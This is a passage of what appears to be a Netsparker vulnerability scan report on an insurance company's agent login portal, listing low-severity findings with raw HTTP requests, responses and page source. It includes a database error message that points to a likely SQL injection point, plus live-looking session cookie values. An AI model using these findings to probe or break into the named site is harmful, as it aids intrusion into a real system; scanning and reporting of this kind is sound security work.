User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.ari-allternet.com
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Thu, 10 Mar 2011 20:22:50 GMT
Server: Microsoft-IIS/6.0
www.ari-allternet.com:
X-Powered-By: ASP.NET
Content-Length: 4477
Content-Type: text/html
Expires: Wed, 09 Mar 2011 20:22:50 GMT
Set-Cookie: ASPSESSIONIDSQRSBDBT=INODLHGAFBHEOLEIMDMLIMLE; path=/
Cache-control: private



<html>
<head>
<META HTTP-EQUIV="PRAGMA" CONTENT="NO-CACHE" NAME="GENERATOR" Content="Microsoft Visual Studio 6.0">
<title>Browser recommendations</title>
<STYLE type="text/css">
.headerTxt
{
FONT-WEIGHT: bold;
FONT-SIZE: 13pt;
COLOR: #262626;
FONT-FAMILY: 'MS Sans Serif', Verdana, Arieal;
font_Size: 16pt
}
.titleTxt
{
FONT-WEIGHT: bold;
FONT-SIZE: 11pt;
COLOR: #262626;
FONT-FAMILY: 'MS Sans Serif', Verdana, Arial
}
.labelTxt
{
FONT-WEIGHT: bold;
FONT-SIZE: 12pt;
COLOR: black;
FONT-FAMILY: 'MS Sans Serif', Verdana, Arial
}
.fieldTxt
{
FONT-WEIGHT: normal;
FONT-SIZE: 7pt;
COLOR: #000099;
FONT-FAMILY: 'MS Sans Serif', Verdana, Arial
BORDER-RIGHT: #78263a 1px solid;
BORDER-TOP: #78263a 1px solid;
BACKGROUND: #ffffff;
BORDER-LEFT: #78263a 1px solid;
BORDER-BOTTOM: #78263a 1px solid;
}
.blackfieldTxt
{
FONT-WEIGHT: normal;
FONT-SIZE: 11pt;
COLOR: #000000;
FONT-FAMILY: 'MS Sans Serif', Verdana, Arial
}
.greyfieldTxt
{
FONT-WEIGHT: normal;
FONT-SIZE: 11pt;
COLOR: #999999;
FONT-FAMILY: 'MS Sans Serif', Verdana, Arial
}
.redfieldTxt
{
FONT-WEIGHT: normal;
FONT-SIZE: 9pt;
COLOR: red;
FONT-FAMILY: 'MS Sans Serif', Verdana, Arial
}
.smallTxt
{
FONT-SIZE: 7pt;
COLOR: #262626;
FONT-STYLE: normal;
FONT-FAMILY: 'MS Sans Serif', Verdana, Arial
}
.bluefieldTxt
{
FONT-WEIGHT: normal;
FONT-SIZE: 11pt;
COLOR: #0000ff;
FONT-FAMILY: 'MS Sans Serif', Verdana, Arial
}
.activetableTxt
{
FONT-WEIGHT: bold;
FONT-SIZE: 11pt;
COLOR: #0000ff;
FONT-FAMILY: 'MS Sans Serif', Verdana, Helvetica, Ariel;
BACKGROUND-COLOR: #cccccc
}
.notactivetableTxt
{
FONT-WEIGHT: bold;
FONT-SIZE: 10pt;
COLOR: #0000ff;
FONT-FAMILY: 'MS Sans Serif', Verdana, Ariel;
BACKGROUND-COLOR: #0000ff
}
.errorTxt
{
FONT-WEIGHT: normal;
FONT-SIZE: 8pt;
COLOR: red;
FONT-FAMILY: 'MS Sans Serif', Arial, Verdana
}
.ageneralblue
{
FONT-SIZE: 11pt;
COLOR: #0000ff;
FONT-FAMILY: 'MS Sans Serif', Verdana, Arial
}
.ageneralblue:hover
{
FONT-SIZE: 11pt;
COLOR: #333399;
FONT-FAMILY: 'MS Sans Serif', Verdana, Arial;
TEXT-DECORATION: underline
}
.ageneralblue:active
{
FONT-SIZE: 11pt;
FONT-FAMILY: 'MS Sans Serif', Verdana, Arial
}

.awhitebold
{
FONT-WEIGHT: bold;
FONT-SIZE: 11pt;
COLOR: #ffffff;
FONT-FAMILY: 'MS Sans Serif', Verdana, Arial
}
.awhitebold:hover
{
FONT-WEIGHT: bold;
FONT-SIZE: 11pt;
COLOR: #ccccff;
FONT-FAMILY: 'MS Sans Serif', Verdana, Arial;
TEXT-DECORATION: underline
}
.awhitebold:active
{
FONT-SIZE: 11pt;
FONT-FAMILY: 'MS Sans Serif', Verdana, Arial;
font_weight: bold
}


A.ageneral:link {
color: #8E0D34;
size: 11pt;
text-decoration: none;
family: 'MS Sans Serif', Verdana, Arial;
}
A.ageneral:visited {
color: #8E0D34;
size: 11pt;
text-decoration: none;
family: 'MS Sans Serif', Verdana, Arial;
}
A.ageneral:hover {
color: #8E0D34;
size: 11pt;
text-decoration: underline;
family: 'MS Sans Serif', Verdana, Arial;
}

A.ageneralbold:link {
color: #8E0D34;
size: 11pt;
text-decoration: none;
family: 'MS Sans Serif', Verdana, Arial;
weight: bold;
}
A.ageneralbold:visited {
color: #8E0D34;
size: 11pt;
text-decoration: none;
family: 'MS Sans Serif', Verdana, Arial;
weight: bold;
}
A.ageneralbold:hover {
color: #8E0D34;
size: 11pt;
text-decoration: underline;
family: 'MS Sans Serif', Verdana, Arial;
weight: bold;
}

table
{
border-color: #78263a;
}
</style>



</head>

<BODY>
<center>
<p>
<table style="testStyle" width="90%">
<tr>
<td>
<h2> Browser Recommednations: </h2>
</td>
</tr>
<p>
<p>
<tr>
<td class = "titleTxt">
<h3>This site was optimized for use with Microsoft&reg; Internet Explorer
4.0 or higher. In order to user this application you need to install more up-to-date version of Internet Explorer.&nbsp;&nbsp;</h3>

<br>
To install the newest version of Microsoft Internet Explorer go to:&nbsp;&nbsp;
<a class = "ageneral" target = "_self" href = "https://www.microsoft.com/downloads/search.asp">Download Internet Explorer</a>

</td>
</tr>
</table>
</center>
<p>
<hr>
</BODY>
</HTML>
Internal Server Error

Internal Server Error

1 TOTAL
LOW
CONFIRMED
1
The Server responded with an HTTP status 500. This indicates that there is a server-side error. Reasons may vary. The behavior should be analysed carefully. If Netsparker is able to find a security issue in the same resource it will report this as a separate vulnerability.

Impact

The impact may vary depending on the condition. Generally this indicates poor coding practices, not enough error checking, sanitization and whitelisting. However there might be a bigger issue such as SQL Injection. If that's the case Netsparker will check for other possible issues and report them separately.

Remedy

Analyse this issue and review the application code in order to handle unexpected errors, this should be a generic practice which does not disclose further information upon an error. All errors should be handled server side only.
- /PVAllOne/AllOne/OpenAllOne.asp

/PVAllOne/AllOne/OpenAllOne.asp CONFIRMED

https://www.ari-allternet.com/PVAllOne/AllOne/OpenAllOne.asp?resolution=

Request

GET /PVAllOne/AllOne/OpenAllOne.asp?resolution= HTTP/1.1
Referer: https://www.ari-allternet.com/PVAllOne/AllOne/AllWebStart.asp?resolution=
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.ari-allternet.com
Cookie: ASPSESSIONIDSQRSBDBT=INODLHGAFBHEOLEIMDMLIMLE; SessionID=108740313; DontShow=1; S%5FID=108740313; DoNotShow=1
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 500 Internal Server Error
Date: Thu, 10 Mar 2011 20:22:59 GMT
Server: Microsoft-IIS/6.0
www.ari-allternet.com:
X-Powered-By: ASP.NET
Content-Length: 7423
Content-Type: text/html
Expires: Wed, 09 Mar 2011 20:22:58 GMT
Cache-control: private






<HTML>
<HEAD>
<Title> All Web</Title>
<link REL="stylesheet" TYPE="text/css" HREF="../_Themes/bars/THEME.CSS" VI6.0THEME="Bars">
<link REL="stylesheet" TYPE="text/css" HREF="../_Themes/bars/GRAPH0.CSS" VI6.0THEME="Bars">
<link REL="stylesheet" TYPE="text/css" HREF="../_Themes/bars/COLOR0.CSS" VI6.0THEME="Bars">
<link REL="stylesheet" TYPE="text/css" HREF="../_Themes/bars/CUSTOM.CSS" VI6.0THEME="Bars"></head>

<META HTTP-EQUIV="PRAGMA" CONTENT="NO-CACHE" NAME="GENERATOR" Content="Microsoft Visual Studio 6.0">
<Script language = "javascript">



function LTrim(str){
for (var i=0; str.charAt(i)==" "; i++);
return str.substring(i,str.length);
}



function RTrim(str){
for (var i=str.length-1; str.charAt(i)==" "; i--);
return str.substring(0,i+1);
}



function Trim(str){
return LTrim(RTrim(str));
}



function ToProperCase(str) {
str = str.toLowerCase();
var strFirstLetter = str.substring(0, 1);
strFirstLetter = strFirstLetter.toUpperCase();
var len = str.length;
var strTheRest = str.substring(1, len);
str = strFirstLetter + strTheRest;
return str;
}


function ToUpperCase(str) {
str = str.toUpperCase();
return str;
}

// Reload the currently passed page name passing along the count of retries and the resolution of
// the page. This is used by the SessionRetry function below.
function ReloadPage(pageName, retryCnt, resolution)
{
window.location = pageName + "?retrycnt=" + retryCnt + "&resolution=" + resolution;
}

// This is called from server side code SessionInvalidRetry() found in AllOneAspFunctions,asp used to
// retry the page when a the session information load fails.
function SessionRetry(pageName, retryCnt, resolution)
{
if (retryCnt < 5)
{
setTimeout("ReloadPage('" + pageName + "'," + retryCnt + "," + resolution + ");",500)
}
}

function SessionNotValid(showMessage) {
if (showMessage > 0) {
//alert("Duplicate User ID has been found. Your Session has been terminated.");
alert("The page has timed out. Please retry.");
}
if (showMessage == 2){
window.location = "../include/window_closer.html";
}
else {
self.focus();
}
}


/**
The following functions is used to manage a prograss bar popup
**/
var progressEnd = 9; // set to number of progress <span>'s.
var progressColor = 'blue'; // set to progress bar color
var progressInterval = 1000; // set to time between updates (milli-seconds)
var pd = window;

var progressAt = progressEnd;
var progressTimer;

function initPopup(pHndle,pgId,pgHeading) {
//var pd = eval(pHndle) ;
if (pgId == null) pgid = 'pgprogress' ;
if (pgHeading == null) pgHeading='Processing information. Please Wait';
pd.document.write('<div id="'+pgid+'" class="hide">');
pd.document.write('<table width="38%" align="left" border="5" cellpadding="1" bordercolordark="cadetblue" bordercolorlight="teal" bgcolor="white" onClick="progress_hide();">');
pd.document.write('<tr>');
pd.document.write(' <td align="center" class="pbHader">'+pgHeading+'</td>');
pd.document.write(' </tr>');
pd.document.write('<tr><td align="center">');
pd.document.write(' <table width="100%" border="0" cellpadding="2" cellspacing="2"><tr><td>');
pd.document.write(' <div style="padding:2px;border:solid cadetblue 1px">');
pd.document.write(' <span id="progress1" style="height: 5px;width: 32px;">&nbsp; &nbsp;</span>');
pd.document.write(' <span id="progress2" style="height: 5px;width: 32px;">&nbsp; &nbsp;</span>');
pd.document.write(' <span id="progress3" style="height: 5px;width: 32px;">&nbsp; &nbsp;</span>');
pd.document.write(' <span id="progress4" style="height: 5px;width: 32px;">&nbsp; &nbsp;</span>');
pd.document.write(' <span id="progress5" style="height: 5px;width: 32px;">&nbsp; &nbsp;</span>');
pd.document.write(' <span id="progress6" style="height: 5px;width: 32px;">&nbsp; &nbsp;</span>');
pd.document.write(' <span id="progress7" style="height: 5px;width: 32px;">&nbsp; &nbsp;</span>');
pd.document.write(' <span id="progress8" style="height: 5px;width: 32px;">&nbsp; &nbsp;</span>');
pd.document.write(' <span id="progress9" style="height: 5px;width: 32px;">&nbsp; &nbsp;</span>');
pd.document.write(' </div>');
pd.document.write(' </td></tr></table>');
pd.document.write('</td></tr></table>');
pd.document.write('</div>');
progressAt = progressEnd;
}

function progress_clear() {
//for (var i = 1; i <= progressEnd; i++) pd.document.getElementById('progress'+i).style.backgroundColor = 'transparent';
//for (var i = 1; i <= progressEnd; i++) pd.document.getElementById('progress'+i).style.backgroundImage= '';
if (progressAt>0) {
if (progressColor =='#8E0D34') {
progressColor ='#EEB4B4' ;
} else {
progressColor ='#8E0D34' ;
}

} else {
//progressColor ='transparent' ;
progressColor ='#EEB4B4' ;
for (var i = 1; i <= progressEnd; i++) pd.document.getElementById('progress'+i).style.backgroundColor = 'transparent';
}
progressAt = 0;
}
function progress_update() {
progressAt++;
if (progressAt > progressEnd) progress_clear();
else pd.document.getElementById('progress'+progressAt).style.backgroundColor = progressColor;
//else pd.document.getElementById('progress'+progressAt).style.backgroundImage = 'url(../images/fish1.ico)';
progressTimer = setTimeout('progress_update()',progressInterval);
}
function progress_stop(pHndle) {
clearTimeout(progressTimer);
progress_clear(pHndle);

}

function progress_hide(pHndle,pbId) {
//var pw = eval(pHndle);
/*
alert('progress_hide called');
alert(pd);
alert(eval(pHndle));
*/
pd = eval(pHndle)
progress_stop(pHndle);
for (var i = 1; i <= progressEnd; i++) pd.document.getElementById('progress'+i).style.backgroundColor = 'transparent';
progressAt = progressEnd;
if (pbId == null) pbId = 'pgprogress';
pd.document.getElementById(pbId).style.visibility = 'hidden' ;
}
function progress_show(pHndle,pbId,heading) {

//update global variable
pd = eval(pHndle);
for (var i = 1; i <= progressEnd; i++) pd.document.getElementById('progress'+i).style.backgroundColor = 'transparent';
//initPopup(pHndle,pbId,heading) ;
if (pbId == null) pbId = "pgprogress";
var w = 480, h = 340;
var popW = 1000, popH = 400;

if (document.all || document.layers) {
w = screen.availWidth;
h = screen.availHeight;
}

var leftPos = (w-popW)/2, topPos = (h-popH)/2;

pd.document.getElementById(pbId).style.visibility = 'visible' ;
pd.document.getElementById(pbId).style.position='absolute';
pd.document.getElementById(pbId).style.left = 83;//leftPos;//+'px' ;
pd.document.getElementById(pbId).style.top = 0;//topPos;//+'px';
pd.document.getElementById(pbId).style.width = popW;//+'%' ;
pd.document.getElementById(pbId).style.height = popH;//+'px' ;
progress_update();

}

</Script><!--
Public Property Get x()
x ==getVal("x")
End Property
Public Property Let x(Value)
Call letVal("x", Value)
End Property
-->

</HEAD>

<font face="Arial" size=2><p>Microsoft OLE DB Provider for ODBC Drivers</font> <font face="Arial" size=2>error '80040e14'</font><p><font face="Arial" size=2>[Microsoft][ODBC SQL Server Driver][SQL Server]Line 1: Incorrect syntax near '='.</font><p><font face="Arial" size=2>/PVAllOne/AllOne/OpenAllOne.asp</font><font face="Arial" size=2>, line 60</font>
Auto Complete Enabled

Auto Complete Enabled

1 TOTAL
LOW
CONFIRMED
1
"Auto Complete" was enabled in one or more of the form fields. These were either "password" fields or important fields such as "Credit Card".

Impact

Data entered in these fields will be cached by the browser. An attacker who can access the victim's browser could steal this information. This is especially important if the application is commonly used in shared computers such as cyber cafes or airport terminals.

Remedy

Add the attribute autocomplete="off" to the form tag or to individual "input" fields.

Actions to Take

  1. See the remedy for the solution.
  2. Find all instances of inputs which store private data and disable autocomplete. Fields which contain data such as "Credit Card" or "CCV" type data should not be cached. You can allow the application to cache usernames and remember passwords, however, in most cases this is not recommended.
  3. Re-scan the application after addressing the identified issues to ensure that all of the fixes have been applied properly.

Required Skills for Successful Exploitation

Dumping all data from a browser can be fairly easy and there exist a number of automated tools to undertake this. Where the attacker cannot dump the data, he/she could still browse the recently visited websites and activate the auto-complete feature to see previously entered values.

External References

- /Login/Login.asp

/Login/Login.asp CONFIRMED

https://www.ari-allternet.com/Login/Login.asp

Identified Field Name

password

Request

GET /Login/Login.asp HTTP/1.1
Referer: https://www.ari-allternet.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.ari-allternet.com
Cookie: ASPSESSIONIDSQRSBDBT=INODLHGAFBHEOLEIMDMLIMLE
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Thu, 10 Mar 2011 20:22:50 GMT
Server: Microsoft-IIS/6.0
www.ari-allternet.com:
X-Powered-By: ASP.NET
Content-Length: 14555
Content-Type: text/html
Expires: Wed, 09 Mar 2011 20:22:50 GMT
Set-Cookie: SessionID=108740313; expires=Fri, 11-Mar-2011 05:00:00 GMT; path=/,CheckAllOneWeb=1; expires=Thu, 10-Mar-2011 06:00:00 GMT; path=/
Cache-control: private



<html>
<head>
<meta HTTP-EQUIV="PRAGMA" CONTENT="NO-CACHE" NAME="GENERATOR" Content="Microsoft Visual Studio 6.0">
<title>Login</title>
<!--<link REL="stylesheet" TYPE="text/css" HREF="../_Themes/bars/THEME.CSS" VI6.0THEME="Bars">
<link REL="stylesheet" TYPE="text/css" HREF="../_Themes/bars/GRAPH0.CSS" VI6.0THEME="Bars">
<link REL="stylesheet" TYPE="text/css" HREF="../_Themes/bars/COLOR0.CSS" VI6.0THEME="Bars">
<link REL="stylesheet" TYPE="text/css" HREF="../_Themes/bars/CUSTOM.CSS" VI6.0THEME="Bars"> --></head>

<STYLE type="text/css">
.headerTxt
{
FONT-WEIGHT: bold;
FONT-SIZE: 13pt;
COLOR: #262626;
FONT-FAMILY: 'MS Sans Serif', Verdana, Arieal;
font_Size: 16pt
}
.titleTxt
{
FONT-WEIGHT: bold;
FONT-SIZE: 11pt;
COLOR: #262626;
FONT-FAMILY: 'MS Sans Serif', Verdana, Arial
}
.labelTxt
{
FONT-WEIGHT: bold;
FONT-SIZE: 12pt;
COLOR: black;
FONT-FAMILY: 'MS Sans Serif', Verdana, Arial
}
.fieldTxt
{
FONT-WEIGHT: normal;
FONT-SIZE: 7pt;
COLOR: #000099;
FONT-FAMILY: 'MS Sans Serif', Verdana, Arial
BORDER-RIGHT: #78263a 1px solid;
BORDER-TOP: #78263a 1px solid;
BACKGROUND: #ffffff;
BORDER-LEFT: #78263a 1px solid;
BORDER-BOTTOM: #78263a 1px solid;
}
.blackfieldTxt
{
FONT-WEIGHT: normal;
FONT-SIZE: 11pt;
COLOR: #000000;
FONT-FAMILY: 'MS Sans Serif', Verdana, Arial
}
.greyfieldTxt
{
FONT-WEIGHT: normal;
FONT-SIZE: 11pt;
COLOR: #999999;
FONT-FAMILY: 'MS Sans Serif', Verdana, Arial
}
.redfieldTxt
{
FONT-WEIGHT: normal;
FONT-SIZE: 9pt;
COLOR: red;
FONT-FAMILY: 'MS Sans Serif', Verdana, Arial
}
.smallTxt
{
FONT-SIZE: 7pt;
COLOR: #262626;
FONT-STYLE: normal;
FONT-FAMILY: 'MS Sans Serif', Verdana, Arial
}
.bluefieldTxt
{
FONT-WEIGHT: normal;
FONT-SIZE: 11pt;
COLOR: #0000ff;
FONT-FAMILY: 'MS Sans Serif', Verdana, Arial
}
.activetableTxt
{
FONT-WEIGHT: bold;
FONT-SIZE: 11pt;
COLOR: #0000ff;
FONT-FAMILY: 'MS Sans Serif', Verdana, Helvetica, Ariel;
BACKGROUND-COLOR: #cccccc
}
.notactivetableTxt
{
FONT-WEIGHT: bold;
FONT-SIZE: 10pt;
COLOR: #0000ff;
FONT-FAMILY: 'MS Sans Serif', Verdana, Ariel;
BACKGROUND-COLOR: #0000ff
}
.errorTxt
{
FONT-WEIGHT: normal;
FONT-SIZE: 8pt;
COLOR: red;
FONT-FAMILY: 'MS Sans Serif', Arial, Verdana
}
.ageneralblue
{
FONT-SIZE: 11pt;
COLOR: #0000ff;
FONT-FAMILY: 'MS Sans Serif', Verdana, Arial
}
.ageneralblue:hover
{
FONT-SIZE: 11pt;
COLOR: #333399;
FONT-FAMILY: 'MS Sans Serif', Verdana, Arial;
TEXT-DECORATION: underline
}
.ageneralblue:active
{
FONT-SIZE: 11pt;
FONT-FAMILY: 'MS Sans Serif', Verdana, Arial
}

.awhitebold
{
FONT-WEIGHT: bold;
FONT-SIZE: 11pt;
COLOR: #ffffff;
FONT-FAMILY: 'MS Sans Serif', Verdana, Arial
}
.awhitebold:hover
{
FONT-WEIGHT: bold;
FONT-SIZE: 11pt;
COLOR: #ccccff;
FONT-FAMILY: 'MS Sans Serif', Verdana, Arial;
TEXT-DECORATION: underline
}
.awhitebold:active
{
FONT-SIZE: 11pt;
FONT-FAMILY: 'MS Sans Serif', Verdana, Arial;
font_weight: bold
}


A.ageneral:link {
color: #8E0D34;
size: 11pt;
text-decoration: none;
family: 'MS Sans Serif', Verdana, Arial;
}
A.ageneral:visited {
color: #8E0D34;
size: 11pt;
text-decoration: none;
family: 'MS Sans Serif', Verdana, Arial;
}
A.ageneral:hover {
color: #8E0D34;
size: 11pt;
text-decoration: underline;
family: 'MS Sans Serif', Verdana, Arial;
}

A.ageneralbold:link {
color: #8E0D34;
size: 11pt;
text-decoration: none;
family: 'MS Sans Serif', Verdana, Arial;
weight: bold;
}
A.ageneralbold:visited {
color: #8E0D34;
size: 11pt;
text-decoration: none;
family: 'MS Sans Serif', Verdana, Arial;
weight: bold;
}
A.ageneralbold:hover {
color: #8E0D34;
size: 11pt;
text-decoration: underline;
family: 'MS Sans Serif', Verdana, Arial;
weight: bold;
}

table
{
border-color: #78263a;
}
</style>


<!--
Public Property Get x()
x ==getVal("x")
End Property
Public Property Let x(Value)
Call letVal("x", Value)
End Property
-->


<script language="javascript">
<!--
var WinRes;

function CheckBrowser(intCookie) {
//if (navigator.appName == "Netscape" && parseInt(navigator.appVersion.charAt(0)) < 4) {
if (navigator.appName == "Netscape") {
window.location = "BrowserDeclined.asp";
}

if (navigator.appName.indexOf("Explorer") > 0 && parseInt(navigator.appVersion.charAt(0)) < 4) {
window.location = "BrowserDeclined.asp";
}

//Textbox - set focus:
if(null!=document.loginForm.UserName) {
document.loginForm.UserName.focus();
}
//check resolution
var resolution = screen.height;
if (resolution < 600) {
//decline browser:
window.location = "BrowserResolution.asp?resolution=1";
}
else {
if (resolution < 700 && intCookie != 1) {
//show recommendation to change the browser settings:
if (!WinRes || WinRes.closed) {
WinRes = window.open("BrowserResolution.asp?resolution=2", '_WinRes', 'menubar = false, width =400, height = 200, top = 200, left = 170');
}
else {
// window's already open; bring to front
WinRes.close();
WinRes = window.open("BrowserResolution.asp?resolution=2", '_WinRes', 'menubar = false, width =400, height = 200, top = 200, left = 170');
}
}
}

}

function onKeyUp()
{
//alert(event.keyCode)
var code = event.keyCode
switch (code) {
case 13: //do automatic carrige return
document.loginForm.submit() ;
break
}
}

var AllWebWin;

function OpenAllWeb(UserID) {
var resolution = screen.availHeight;
var winProperties ='menubar = false, width ='+ window.screen.availWidth +', height ='+ (window.screen.availHeight - 30) +', top = 0, left = 0';

if (!AllWebWin || AllWebWin.closed) {
AllWebWin = window.open("../PVAllOne/AllOne/AllWeb.asp?strUserID=" + UserID + "&resolution=" + resolution, '_mainWindow', winProperties);
if (navigator.appName == "Netscape") {
AllWebWin.outerWidth = screen.availWidth;
AllWebWin.outerHeight = screen.availHeight;
AllWebWin.moveTo(0,0);
}

}
else {
AllWebWin.focus()
}
}


function LogOut() {
var closeWin = window.open("LogoutImproper.asp", '_LogOutImproper', 'menubar = false, width =300, height = 200, top = 100, left = 100');
if (navigator.appName == "Netscape") {
closeWin.outerWidth = 300;
closeWin.outerHeight = 200;
closeWin.moveTo(100, 100);
}
window.location = "Login.asp";
}

function SavePassword()
{
var strOldPswd = document.forms[0].password.value;
var strNewPswd = document.forms[0].NewPassword.value;
var strConfPswd = document.forms[0].ConfirmNewPassword.value;

if (strNewPswd == strOldPswd)
{
alert("Your new password can't match your old password.");
document.forms[0].password.value = "";
document.forms[0].NewPassword.value = "";
document.forms[0].ConfirmNewPassword.value = "";
return false;
}
if (strNewPswd != strConfPswd)
{
alert("Your new password does not match the confirmed password.");
document.forms[0].NewPassword.value = "";
document.forms[0].ConfirmNewPassword.value = "";
return false;
}
if (strNewPswd =="" || strConfPswd=="")
{
alert("Please fill out the form completely");
document.forms[0].NewPassword.value = "";
document.forms[0].ConfirmNewPassword.value = "";
return false;
}
return true;
}

function goURL(page, protocol){
var baseURL = protocol + "://www.ari-ins.com/";
document.location.href = baseURL + page;
}
-->
</script>
<noscript>
<img src="../images/main_02.jpg"><br>
<b>Your Browser has JavaScript turned off. </b><p>
In order to use this application you need to turn Java Script on. <br>
Open you browser preferences, and enable Java Script.<br>
You do not have to restart your browser or your computer after you enable Java Script. Simply click the &quot;Reload&quot; button.
<hr>
</noscript>
<link rel="stylesheet" href="../images/ari_li.css" type="text/css" />
</head>



<body bgcolor="#DDD8CC" leftmargin="0" topmargin="0" rightmargin="0" bottommargin="0">
<div align="center" >
<table width="750" height="100%" border="0" cellpadding="0" cellspacing="0">
<tr>
<td height="1%" valign="top" class="pageborder">
<table width="100%" border="0" cellspacing="0" cellpadding="0">
<tr>
<td width="100%" colspan="3" class="toptile"><img src="../images/top_tile.gif" width="13" height="16"></td>
</tr>
</table>
<table width="100%" border="0" cellspacing="0" cellpadding="0">
<tr>
<td width="35" height="36" valign="top"><img src="../images/menuleft.gif" width="35" height="36"></td>
<td valign="top" class="menu"><a href="javascript:goURL('index.htm', 'http');" class="menuitem">Home</a>
<img src="../images/menudiv.gif" width="26" height="29" align="middle">
<a href="javascript:goURL('ari_aboutus.htm', 'http');" class="menuitem">About Us</a> <img src="../images/menudiv.gif" width="26" height="29" align="middle">
<a href="javascript:goURL('press.htm', 'http');" class="menuitem">Press Releases</a>
<img src="../images/menudiv.gif" width="26" height="29" align="middle">
<span class="menuitemselect">Agent Login</span> <img src="../images/menudiv.gif" width="26" height="29" align="middle">
<a href="javascript:goURL('claims.htm', 'http');" class="menuitem">Claims</a> <img src="../images/menudiv.gif" width="26" height="29" align="middle">
</td>
<td width="35" align="right" valign="top"><img src="../images/menuright.gif" width="35" height="36"></td>
</tr>
</table>
<!--end of about header-->
<table width="100%" border="0" cellspacing="0" cellpadding="0">
<tr>
<td width="456"><img src="images/main_01.jpg" width="456" height="232"></td>
<td width="313"><img src="images/main_02.jpg" width="313" height="232"></td>
</tr>
</table> </td>
</tr>

<tr>
<td height="98%" align="center" valign="top" bgcolor="#FFFFFF" class="pageborder" style="padding: 10 0 0 0;">
<table width="100%" border="0" cellspacing="0" cellpadding="0">
<tr>
<td width="214" align="center" valign="top" style="border-right:1px solid #B9BDB9;"><img src="../images/leftbanner.gif" width="198" height="121">
<div style="padding-bottom:10px;"></div>
<table width="198" border="0" cellspacing="0" cellpadding="0">
<tr>
<td width="233"><img src="../images/lefttable_top.gif" width="198" height="15"></td>
</tr>
<tr>
<td class="lefttable"><strong>Contact Us</strong><br> <br> <strong>ARI
Insurance Companies</strong><br>
133 Franklin Corner Road<br>
Lawrenceville, NJ 08648<br> <br>
Phone: 800-820-4506<br>
Fax: 609-882-4088<br>
<a href="mailto:info@ari-ins.com">info@ari-ins.com</a> </td>
</tr>
<tr>
<td><img src="../images/lefttable_bottom.gif" width="198" height="15"></td>
</tr>
</table></td>
<td width="568" valign="top"><div class="bodytext"><span class="headings">Agent
Login<br>
<br>
</span>
<hr align="left" width="95%" size="1" noshade>
<span class="headings"> </span></div>
<div class="bodytext" style="padding:0 0 0 50;">



<body onload="CheckBrowser()">
<p>
<center>
<form method="post" action="Login.asp" id="loginForm" name="loginForm">
<br>
<br>
<br>
<table style="WIDTH: 500px; HEIGHT: 308px" bgcolor="white">
<tr><td>
<table width="100%">


<tr> <td>
<table border="0" width="100%" cellpadding="3" bgcolor="white">
<tr>

<td width="12%" height="35" class="bodytd">
User ID: </td>
<td width="88%" height="35"><input name="UserName" maxlength="50" value="" class="textarea" onKeyUp="javascript:onKeyUp()"></td>

</tr>
<tr>

<td width="12%" height="35" class="bodytd">
Password</td>
<td width="88%" height="35"><input type="password" name="password" maxlength="12" class="textarea" onKeyUp="javascript:onKeyUp()"></td>
</tr>
<tr>
<td>&nbsp;</td>
<td style="padding: 6 0 0 0;"><input name="button" type="button" class="buttonstyle" value="Sign On"onclick="document.loginForm.submit()"></td>
</tr>
<tr>
<td>&nbsp;</td>
<td class="bodytd" style="padding:14 0 0 0;"><a href="Password.asp?strError=0" class="newslinks">
Forgot your password</a></td>
</tr>
<tr>
<td>&nbsp;</td>
<td class="bodytd" style="padding:14 0 0 0;"><a href="browsers.asp" class="newslinks">Browser Recommendations</a></td>
</tr>
<tr>
<td>&nbsp;</td>
<td class="bodytd" style="padding:14 0 0 0;"><a href="faq.htm" class="newslinks">Frequently Asked Questions</a></td>
</tr>
</table>
<p>&nbsp;</p>
<div style="margin: 10 0 10 0">
<img src="sslcert.gif" />
</div>
</td></tr>
</table>
</td></tr>
</table>
</form>
</p>
</center>


</div>
</td>
</tr>
<tr>
<td align="right"&g..
Cookie Not Marked As HttpOnly

Cookie Not Marked As HttpOnly

1 TOTAL
LOW
CONFIRMED
1
Cookie was not marked as HTTPOnly. HTTPOnly cookies can not be read by client-side scripts therefore marking a cookie as HTTPOnly can provide an additional layer of protection against Cross-site Scripting attacks..

Impact

During a Cross-site Scripting attack an attacker might easily access cookies and hijack the victim's session.

Actions to Take

  1. See the remedy for solution
  2. Consider marking all of the cookies used by the application as HTTPOnly (After these changes javascript code will not able to read cookies.

Remedy

Mark the cookie as HTTPOnly. This will be an extra layer of defence against XSS. However this is not a silver bullet and will not protect the system against Cross-site Scripting attacks. An attacker can use a tool such as XSS Tunnel to bypass HTTPOnly protection.

External References

- /Login/BrowserDeclined.asp

/Login/BrowserDeclined.asp CONFIRMED

https://www.ari-allternet.com/Login/BrowserDeclined.asp

Identified Cookie

ASPSESSIONIDSQRSBDBT

Request

GET /Login/BrowserDeclined.asp HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.ari-allternet.com
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Thu, 10 Mar 2011 20:22:50 GMT
Server: Microsoft-IIS/6.0
www.ari-allternet.com:
X-Powered-By: ASP.NET
Content-Length: 4477
Content-Type: text/html
Expires: Wed, 09 Mar 2011 20:22:50 GMT
Set-Cookie: ASPSESSIONIDSQRSBDBT=INODLHGAFBHEOLEIMDMLIMLE; path=/
Cache-control: private



<html>
<head>
<META HTTP-EQUIV="PRAGMA" CONTENT="NO-CACHE" NAME="GENERATOR" Content="Microsoft Visual Studio 6.0">
<title>Browser recommendations</title>
<STYLE type="text/css">
.headerTxt
{
FONT-WEIGHT: bold;
FONT-SIZE: 13pt;
COLOR: #262626;
FONT-FAMILY: 'MS Sans Serif', Verdana, Arieal;
font_Size: 16pt
}
.titleTxt
{
FONT-WEIGHT: bold;
FONT-SIZE: 11pt;
